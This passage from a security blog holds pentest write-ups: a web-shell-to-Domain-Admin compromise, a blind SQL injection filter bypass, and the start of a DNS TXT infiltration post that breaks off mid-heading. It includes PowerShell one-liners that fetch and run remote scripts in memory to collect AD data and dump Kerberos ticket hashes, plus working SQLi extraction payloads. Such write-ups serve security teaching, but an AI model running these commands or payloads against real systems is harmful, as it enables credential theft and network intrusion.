src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_DsBI3_bzdlcLt7cXSvbLEYxrzBrnY6ERvSaG_rn95yqw0K08rPGglO0d6R2dBFO5RepFyVqfstT_K0o6pItQpAGIUfxXmUZuMc7wGECcxFs1v7QqNZwMMdOauGJIE1ya7dz041X0DvA/s16000/4.1.png" /></a></div><br /><p><br />Now, uploaded PHP web shell as well to gain access on server.<br /><br /><br /><span style="color: white;"><span style="font-size: large;">PHP Web shell user access issue</span></span><br />Once Web shell access achieved, executed "systeminfo" and "whoami" command to check the environment and current user privilege.<br /><br />Systeminfo returned the output and value of "Domain" in output showed that machine is member of organization's Active directory Domain.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5RUMLhU934dhQoN7WQ4FfiEPyfF9JvFGIdIrIG05FTBln1zz60uNp6aTs8_DpUHAiT6FUVQ7x_cCVBb28GnCUB_lpkx4NLKzuarHFEPECXTV5nKgOaAquGsP2lncjEDZGD2Bkc9jSfZg/s1093/4.5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="496" data-original-width="1093" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5RUMLhU934dhQoN7WQ4FfiEPyfF9JvFGIdIrIG05FTBln1zz60uNp6aTs8_DpUHAiT6FUVQ7x_cCVBb28GnCUB_lpkx4NLKzuarHFEPECXTV5nKgOaAquGsP2lncjEDZGD2Bkc9jSfZg/s16000/4.5.png" /></a></div><br /> <br />Whoami command showed web shell is running with "IIS_IUSRS" user privilege.<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEmEIzgdM2jdumNOwWsSiXr4E0aadW2sSWoHpwNdkBSIY6lthjdRLtvKirJjVYpwTu5uI6VJXxuInQJbszFPDY87_867WkE4uKmE4S0B1OJb6mH1vsWsn3M7ZBdHewUH4Jbz-dR9TIELU/s1192/4.2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="293" data-original-width="1192" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEmEIzgdM2jdumNOwWsSiXr4E0aadW2sSWoHpwNdkBSIY6lthjdRLtvKirJjVYpwTu5uI6VJXxuInQJbszFPDY87_867WkE4uKmE4S0B1OJb6mH1vsWsn3M7ZBdHewUH4Jbz-dR9TIELU/s16000/4.2.png" /></a></div><br /><p>At that point of time, next step was to run bloodhound script and Kerberoasting script.<br />But current user was not able to communicate to domain controller machine to perform kerberoasting or to gather the information. <br /><br />I had cleared my mind and started correlating the things:<br />1. Web server is IIS<br />2. .NET is installed (Windows machine)<br />3. ASP webshell may have different privilege (NT AUTHORITY\NETWORK SERVICE etc)<br /><br />The moment I tried with ASPX webshell and checked output of "whoami" command, it was "NT AUTHORITY\NETWORK SERVICE". Tried with Powerview script to enumerate the list of DC machines and it worked like a charm.<br /></p><p style="text-align: center;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9wgvVO26BmPt-22QppahovfvKarmqkuHcHvrewBwfZegyx4oo9NTZOkj1U1IGiHt5uJpal7Y_TMHlsZ9k-DKoEsG4uBv2jUqHU4dthUF8P8XvPiek5ImO_ijvDFiiIC50-uD_qvmklIY/s1126/5.jpeg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="498" data-original-width="1126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9wgvVO26BmPt-22QppahovfvKarmqkuHcHvrewBwfZegyx4oo9NTZOkj1U1IGiHt5uJpal7Y_TMHlsZ9k-DKoEsG4uBv2jUqHU4dthUF8P8XvPiek5ImO_ijvDFiiIC50-uD_qvmklIY/s16000/5.jpeg" /></a></div><p>Again, I was in the game.<br /><br /><span style="color: white;"><span style="font-size: large;">Kerberoasting and data gathering using BloodHound </span></span><br />It was Windows 2008 server machine so ran both the PowerShell scripts "in-Memory" and got the data.<br />For more information regarding Kerberoasting, please visit <a 
href="https://adsecurity.org/?p=3458">https://adsecurity.org/?p=3458</a><br /></p><p>BloodHound PowerShell script to gather the info from AD<br /></p><blockquote>powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/incredibleindishell/Windows-AD-environment-related/master/Blood_Hound/bps_in.ps1'); Invoke-BloodHound -CollectionMethod All -CompressData -RemoveCSV </blockquote><br />Kerberoasting PowerShell script to grab the "Kerberos TGS Ticket"<p></p><p><br /></p><blockquote>powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty hash | Out-File -filepath ticket_b0x.txt </blockquote> <br />Once BloodHound script gathered the data from Active directory, uploaded the ZIP file to Local BloodHound console. <br />In console, checked the the possibilities to gain Domain Admin user privilege from Kerberoastable user.<br />BloodHound showed that there are few users which can lead to Domain Admin user access.<p></p><p style="text-align: center;"></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN8OkFSMjwWZ-Zes3ytuGNGEovV2NKU_SZEtN9Vv027EUi909UbBxI7O6NaUhn0zovC0Z2rLsv9voN3DBcp0WWeNCpJJmFkqF0M4FZJj6nVWU2FRyqcC_DolIV1krqNiW3WHJ7W5Z7pP8/s1898/bh.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="863" data-original-width="1898" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN8OkFSMjwWZ-Zes3ytuGNGEovV2NKU_SZEtN9Vv027EUi909UbBxI7O6NaUhn0zovC0Z2rLsv9voN3DBcp0WWeNCpJJmFkqF0M4FZJj6nVWU2FRyqcC_DolIV1krqNiW3WHJ7W5Z7pP8/s16000/bh.png" /></a></div><br /> Using Hashcat, tried with those specific users and got success after 1 day (Special Thanks to Ashwath Sir)<br /><br /><span 
style="color: white;"><span style="font-size: large;">HTTP Tunneling trick to access the internally hosted machines</span></span><br />Now, target was to access the Internal sensitive machines such as Domain Controller.<br />Perimeter firewall outbound connection rules blocked the reverse shell connection.<br />To overcome the issue, I used HTTP tunneling script developed by NCC group "A Black Path Toward The Sun"<br /><a href="https://github.com/nccgroup/ABPTTS">https://github.com/nccgroup/ABPTTS</a> <br /><br />Uploaded the ASPX script from ABTTS to the server. Started Python client script on my local machine and specified the DC Machine internal IP.<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiqNA0p3cZYrUyWdGkfve5jG8sENm126aWCNw8vHg7DaNlTm4VkPWvFGE4pRI4mKsz5qYcVRqQYdFauyKC9WxBxcZz4uF5jhQ8aKVi5ZVQAjq99mwZPgGn4bgzMMuDD33NpqjctrGqSck/s1880/7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="783" data-original-width="1880" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiqNA0p3cZYrUyWdGkfve5jG8sENm126aWCNw8vHg7DaNlTm4VkPWvFGE4pRI4mKsz5qYcVRqQYdFauyKC9WxBxcZz4uF5jhQ8aKVi5ZVQAjq99mwZPgGn4bgzMMuDD33NpqjctrGqSck/s16000/7.png" /></a></div><p>ABTTS HTTP tunneling script accepted traffic from my local machin, passed it to ASPX script uploaded on compromised machine and ASPX script decrypted and passed the traffic to internal machine.<br /><br />This is how any internal machine was accessible on my localhost.<br /><br />Later, took advantage of over-broad ACL permissions to reach the Domain Admin user account.</p><p>Thanks for reading.</p><p><br />Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" 
target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, vivek chauhan, Manoj and <a href="https://twitter.com/5h4d0w_hun73r">Karan</a>
<br />
</p><div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui","arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui","arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<p><br /><br /></p>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-53776035768241919342020-09-06T10:59:00.009+05:302023-11-23T10:32:29.402+05:30SQL Injection filter bypass to perform blind SQL Injection<p>Hello, in this blog post I will discuss a scenario in which a web application was vulnerable to SQL Injection, but the user input was being filtered by code that removed characters such as ' " ( ) % etc. <br /><br /><span style="color: white;"><b>Technology/back-end used by the web application</b></span></p><ol style="text-align: left;"><li>PHP </li><li>MySQL <br /></li></ol><h2 style="text-align: left;"><span style="color: white;">Scenario: </span></h2><br />The PHP code accepted user input through the HTTP GET parameter "param1". The value was passed to a custom data filtering function, "input-filter".<br /><p style="text-align: left;">The function "input-filter" is meant to strip out some special characters which can lead to SQL Injection.<br /> </p><p style="text-align: left;">After performing input sanitization, the function passes the data to the SQL query in the PHP code.<br />In the SQL query, the user data ($user_input) was being used as the "column name" in the "select" statement, as follows:<br /><br /><textarea style="height: 16px; margin: 0px; width: 949px;">$query = mysqli_query($connection,"SELECT $user_input,time FROM stats WHERE depth = '$depth' ORDER BY times ASC"); </textarea><br /> </p><p style="text-align: left;">The web application code only processed the SQL query output internally; nothing from it was shown on the web interface. Because of this, union based SQL injection was not possible.<br /><br />The web application code was not using "mysqli_error()" to show SQL server error messages, which killed the chance to perform error based SQL Injection.</p><p style="text-align: left;">The only possibility was Blind SQL Injection. 
To perform blind SQL injection there was a limitation: the web application's "input-filter" function stripped out the characters mentioned below:<br /><textarea style="height: 24px; margin: 0px; width: 222px;">" < > = ' ( ) & @ % # ; </textarea><br /><br />When we use a basic boolean based blind injection payload such as:<br />
</p><p class="FindingCode"><span style="color: black; mso-color-alt: windowtext;"><textarea style="height: 28px; margin: 0px; width: 600px;"> 1 from dual where true and 1< ascii ( substring ( database (),1,1 ) )</textarea></span></p><p>After passing through the user input filter function, the payload changes to the one mentioned below:<br /><span style="color: black; mso-color-alt: windowtext;"><br /><textarea style="height: 27px; margin: 0px; width: 499px;"> 1 from dual where true and 1 ascii substring database ,1,1</textarea></span><br /><br /><span style="color: white;"><b>URL encoded payload processing:</b> <br /></span></p><p>The web application's user input filter function was stripping out the % character as well, which made URL encoding of the payload useless.<br />Let's consider that URL encoding has been used for characters such as ( and ), and the payload is like this:</p><p class="FindingCode"><span style="color: black; mso-color-alt: windowtext;"><textarea style="height: 30px; margin: 0px; width: 726px;">1 from dual where true and 1 %3C ascii %28 substring %28 database %28 %29 %2C 1 %2C 1 %29%29</textarea></span><br /></p>After processing through the user input filter function, the payload became:<p class="FindingCode"><span style="color: black; mso-color-alt: windowtext;"><textarea style="height: 29px; margin: 0px; width: 673px;"> 1 from dual where true and 1 3C ascii 28 substring 28 database 28 29 2C 1 2C 1 2929 </textarea><br /></span></p><br /><h2 style="text-align: left;"><span style="color: white;">Exploitation: </span></h2>In this case, my way to perform exploitation was blind injection. To avoid the stripping of payload characters, I used the "like" clause in the where condition with a hex representation of the search pattern. 
<br /><br /><span style="color: white;"><b>Like clause and hex encoded wildcard search pattern:</b></span><br />Let's have a look at the like clause functionality.<br /><br />The 'Like' operator performs a search in the SQL database using a wildcard search pattern.<br /> <br />For example, if a user wants to search for text in a column which has the string 'user' anywhere in it, the SQL query will be:<br /><p class="FindingCode" style="text-align: left;"><span style="color: black; mso-color-alt: windowtext;"><textarea style="height: 25px; margin: 0px; width: 547px;"> select column_name from table_name where value_in_column like '%user%'</textarea><br /></span><br />The above-mentioned SQL query will retrieve the data from the column which has the string 'user' anywhere in it.<br /><br />The like clause does not only take its pattern in single quotes; MySQL also accepts it as a hexadecimal literal (0x...), which it treats as a string:<br /><br /><textarea style="height: 42px; margin: 0px; width: 274px;">Text Hex encoded value
%user% 257573657225</textarea><span style="color: black; mso-color-alt: windowtext;"><br /></span></p><p class="FindingCode" style="text-align: left;">This means we can use an SQL query with the "like" clause and a "hex encoded wildcard value" like this:<span style="color: black; mso-color-alt: windowtext;"><br /></span></p><p class="FindingCode" style="text-align: left;"><span style="color: black; mso-color-alt: windowtext;"><textarea style="height: 29px; margin: 0px; width: 586px;"> select column_name from table_name where value_in_column like 0x257573657225</textarea><br /></span><br /></p><h3 style="text-align: left;"><span style="color: white;"><b>Extracting table and column names</b></span></h3><p class="FindingCode" style="text-align: left;">To perform exploitation in this scenario, I kept the following in mind:<br /></p><ol style="text-align: left;"><li>There is a restriction on using characters such as ' ( ) < > %</li><li>User input is passed to the column name field in the "select" statement, so I used "1 from dual" to complete the "select" statement.</li><li>Use the "like" clause with a hex encoded wildcard pattern.</li><li>Guess characters one-by-one <br /></li></ol><p><span style="color: white;"><b>Table name extraction payload:</b></span></p><p>Consider that we have a table named "auth". 
<br /></p><p>Payload to look for the table name "auth" (whose first character is 'a') using the like clause:</p><p><textarea style="height: 21px; margin: 0px; width: 676px;">select table_name from information_schema.tables where table_name like 'a%' limit 0,1</textarea></p><p>Payload with the hex encoded like clause wildcard value:</p><p><textarea style="height: 20px; margin: 0px; width: 710px;">select table_name from information_schema.tables where table_name like 0x6125 limit 0,1</textarea></p><p>In my case, the user data was passed as the column name in the SQL query, so the payload was: <br /></p><p><textarea style="height: 20px; margin: 0px; width: 710px;">table_name from information_schema.tables where table_name like 0x6125 limit 0,1-- -</textarea></p><p>The SQL query in the application was executed as:<br /></p><p><textarea style="height: 16px; margin: 0px; width: 1230px;">select table_name from information_schema.tables where table_name like 0x6125 limit 0,1-- - ,time FROM stats WHERE depth = '$depth' ORDER BY times ASC</textarea></p><div class="separator" style="clear: both; text-align: center;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzf4IiyxDb5cglLZQCmE1ZMplVDOLC5ErTIkTum58zp_II2MwUOyuXW7L5nnPeJAOCaO5b4YLdvpOjJNHmha5nqy5qz8WBrX3SVWbJclnC6BLynfmSHwmoreWwuIrK3hyphenhyphenhSwPGvIOpmKY/s1166/table_name1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="538" data-original-width="1166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzf4IiyxDb5cglLZQCmE1ZMplVDOLC5ErTIkTum58zp_II2MwUOyuXW7L5nnPeJAOCaO5b4YLdvpOjJNHmha5nqy5qz8WBrX3SVWbJclnC6BLynfmSHwmoreWwuIrK3hyphenhyphenhSwPGvIOpmKY/s16000/table_name1.png" /></a></b></div><p><span style="color: white;"><b>Column name extraction payload:</b></span></p><p>Consider that we have a column named "username" in table "auth". 
<br /></p><p>Payload to look for the column name "username" (whose first character is 'u') in table "auth" using the like clause:</p><p><textarea style="height: 23px; margin: 0px; width: 927px;">select column_name from information_schema.columns where table_name like 'auth' and column_name like 'u%' limit 0,1</textarea></p><p>Payload with the hex encoded like clause wildcard value:</p><p><textarea style="height: 23px; margin: 0px; width: 961px;">select column_name from information_schema.columns where table_name like 0x61757468 and column_name like 0x7525 limit 0,1</textarea></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo9utLoUJeDImlc2dW1d7wSiDXiYsyrKzjUAeL1kLLtM435oLmM5Z2ayu5s3BQ_83CUQ9ojrsPT-uhJxj37jhbATwFiCy-NwmxZuTvyvHb8xJ1_tre_9RTumySmc7RdJ0tNAFceNK4nZQ/s1452/column+name.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="355" data-original-width="1452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo9utLoUJeDImlc2dW1d7wSiDXiYsyrKzjUAeL1kLLtM435oLmM5Z2ayu5s3BQ_83CUQ9ojrsPT-uhJxj37jhbATwFiCy-NwmxZuTvyvHb8xJ1_tre_9RTumySmc7RdJ0tNAFceNK4nZQ/s16000/column+name.png" /></a></div><p><span style="color: white;"><b>Data extraction payload:</b></span></p><p>To extract the data from column "username" of table "auth", use the like clause with a hex encoded wildcard pattern. <br /></p><p>Payload to look for the username "ace" in column "username" of table "auth" using the like clause:</p><p><textarea style="height: 23px; margin: 0px; width: 927px;">select username from auth where username like 'a%' limit 0,1</textarea></p><p>Payload with the hex encoded like clause wildcard value:</p><p><textarea style="height: 23px; margin: 0px; width: 961px;">select username from auth where username like 0x6125 limit 0,1</textarea></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkvXvHtpLWR2pUrSPIj-K8dKpy0cIEyy90Vh5R7ypjrgK8wvw5e6VhLp9l9jHfudr0VDVQPTuzR5WizWE5FSjDToYKAfMJerx3cwfXWVY6CB7jxcGypPR1jDKZRE6DqRWoRyPMFJSOjY/s980/data.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="533" data-original-width="980" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkvXvHtpLWR2pUrSPIj-K8dKpy0cIEyy90Vh5R7ypjrgK8wvw5e6VhLp9l9jHfudr0VDVQPTuzR5WizWE5FSjDToYKAfMJerx3cwfXWVY6CB7jxcGypPR1jDKZRE6DqRWoRyPMFJSOjY/s16000/data.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: white;">Conclusion:</span></h2>
<div style="text-align: left;">
SQL injection exploitation can be tricky but there may be a way to perform it. </div>
<h2 style="text-align: left;">
<span style="color: white;">Remediation:</span></h2>
<div style="text-align: left;">
To prevent SQL Injection attacks, refer to the OWASP guide:</div>
<div style="text-align: left;">
<a href="https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html">https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</a></div>
<br />
Thanks for reading :)<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/albinowax" target="_blank">James Kettle</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
</div>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-54888923791079787272020-08-08T18:50:00.001+05:302023-11-23T10:32:43.040+05:30Bypassing internet connectivity and copy-paste restriction to Infiltrating malicious data<p style="text-align: left;">In this blog post I will discuss the infiltration of data to a machine which has the following restrictions:</p><ol style="text-align: left;"><li>Internet connectivity is not allowed.</li><li>Copy-Paste operation is blocked.</li><li>File uploading is restricted <br /></li></ol><h2 style="text-align: left;">Scenario: <br /></h2><p style="text-align: left;">We have a machine which is not connected to the internet but is hosted inside the corporate network. The machine is connected to a DNS server which can resolve DNS queries for internet-based domain names.</p><p style="text-align: left;">Here, to import the malicious binary file or code, we make a DNS request to the internal DNS server. 
The internal DNS server performs the query over the internet and sends the answer back to the user machine.<br /></p><p style="text-align: left;">The host machine cannot reach internet-based domain names directly.</p><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfiHbQwn4EfUlnIofyGVV5YSlY0hrz6FTS4z0_7RqqBC8XKBujZsARKwx7xLxnUvEdWzuherXUIuSXPsM-JJaVopV6sTkJcL3Lae7jrYNqf7lCxB4P_sAzHs_VVyh7w7qwUu1dWy4HuX0/s603/1.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="171" data-original-width="603" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfiHbQwn4EfUlnIofyGVV5YSlY0hrz6FTS4z0_7RqqBC8XKBujZsARKwx7xLxnUvEdWzuherXUIuSXPsM-JJaVopV6sTkJcL3Lae7jrYNqf7lCxB4P_sAzHs_VVyh7w7qwUu1dWy4HuX0/s0/1.png" /></a></p><p style="text-align: left;">But when the user performs a DNS query, it is routed through one of the internal DNS servers and the domain name is resolved.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCiWG1yScVSHujpMJZm7W-5pE2ajPc4XI8RsrEOsXHs_HkaapbhkXjFQGyTSRxEVU10KwWYwWM5AuYafXO5QGmA69IhMUVJiFuN7YZj5vS3yxThs54QVYvqjc3zKHpbsFDGLjeDSHkcxo/s580/2.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="184" data-original-width="580" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCiWG1yScVSHujpMJZm7W-5pE2ajPc4XI8RsrEOsXHs_HkaapbhkXjFQGyTSRxEVU10KwWYwWM5AuYafXO5QGmA69IhMUVJiFuN7YZj5vS3yxThs54QVYvqjc3zKHpbsFDGLjeDSHkcxo/s0/2.png" /></a></div><h2 style="text-align: left;">Infiltrating the data from the internet using DNS TXT records </h2><p>A DNS TXT record allows the user to specify text for a domain name. 
The definition provided by Wikipedia is:</p><p><i>"A TXT record (short for text record) is a type of resource record in the Domain Name System (DNS) used to provide the ability to associate arbitrary text with a host or other name, such as human readable information about a server, network, data center, or other accounting information."</i> <br /></p><p>I added a TXT record for the domain name "box.mannulinux.org" <br /></p><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBpJKxOKO3fL5I8sjSwApOkWMDu6SWKNCsjotBWZp0lRd9qFIe-7So2wzAhsX3crNPLTHCU3X4RJqg9t5zBf00mkLV7MAk7aTwQ4O4GVuuTP-OasF-c9wVv_ePXoGa1IQ41t25aKP5k7k/s1278/0.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="190" data-original-width="1278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBpJKxOKO3fL5I8sjSwApOkWMDu6SWKNCsjotBWZp0lRd9qFIe-7So2wzAhsX3crNPLTHCU3X4RJqg9t5zBf00mkLV7MAk7aTwQ4O4GVuuTP-OasF-c9wVv_ePXoGa1IQ41t25aKP5k7k/s640/0.png" width="640" /></a></div><p style="text-align: left;">The NSLOOKUP command can perform a DNS TXT record query for a domain. 
To perform the TXT record query, use the below mentioned command:</p><p style="text-align: left;"><textarea cols="30" rows="6" style="height: 20px; margin: 0px; width: 300px;">nslookup -querytype=txt domain_name</textarea><br /> <br />In my case it will be:</p><p style="text-align: left;"><textarea cols="30" rows="6" style="height: 20px; margin: 0px; width: 400px;">nslookup -querytype=txt box.mannulinux.org</textarea></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdG5x-chCY_kOVkKIrxyEx8Nb05pPNI0f1a6wi5UmMZq8f6_aG8dQmlCmcAKc4lJvba06ZJHzVWF-TOKKzgKrztI1Ho1sSaVULYPr8F9XVybZLEkjBt3WHlAgRNuUzSykuFMjMm6UTP0E/s481/3.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="193" data-original-width="481" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdG5x-chCY_kOVkKIrxyEx8Nb05pPNI0f1a6wi5UmMZq8f6_aG8dQmlCmcAKc4lJvba06ZJHzVWF-TOKKzgKrztI1Ho1sSaVULYPr8F9XVybZLEkjBt3WHlAgRNuUzSykuFMjMm6UTP0E/s0/3.png" /></a></div><p style="text-align: left;">TXT records don't have a restriction on the type of text which can be specified by a user. 
A user can specify base64 encoded text or even binary:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVCuW5XPZatpwkcrVB1PKQaEzD0Qn8xAtpRX9NxCYSBvFeHIF3xVBey0E337C9qId743B1kKiwyO_UiDcivhurE_ScrMPIoTVr0oswwO72S_yYq1uCRU-6IMxKg0dkUnDPtX0ezWdaoiU/s1335/0.1.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="247" data-original-width="1335" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVCuW5XPZatpwkcrVB1PKQaEzD0Qn8xAtpRX9NxCYSBvFeHIF3xVBey0E337C9qId743B1kKiwyO_UiDcivhurE_ScrMPIoTVr0oswwO72S_yYq1uCRU-6IMxKg0dkUnDPtX0ezWdaoiU/s640/0.1.png" width="640" /></a></div><p style="text-align: left;">Perform the query again and we will get the data:<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3JhzIzg4JK1XJIAw9eD-w_qUQkWTl4qoWZpUh3mRIBVfgxqF2UXtBHxrtJWv0LbrBF536Do4Lds6xdPQwYVZkekl_iXQFOzous_mm-cfp9xIRy62m94xq8xjmf_CTbdevI8BYIKBUsv4/s544/4.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="203" data-original-width="544" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3JhzIzg4JK1XJIAw9eD-w_qUQkWTl4qoWZpUh3mRIBVfgxqF2UXtBHxrtJWv0LbrBF536Do4Lds6xdPQwYVZkekl_iXQFOzous_mm-cfp9xIRy62m94xq8xjmf_CTbdevI8BYIKBUsv4/s0/4.png" /></a></p><h2 style="text-align: left;">Decoding the text using PowerShell<br 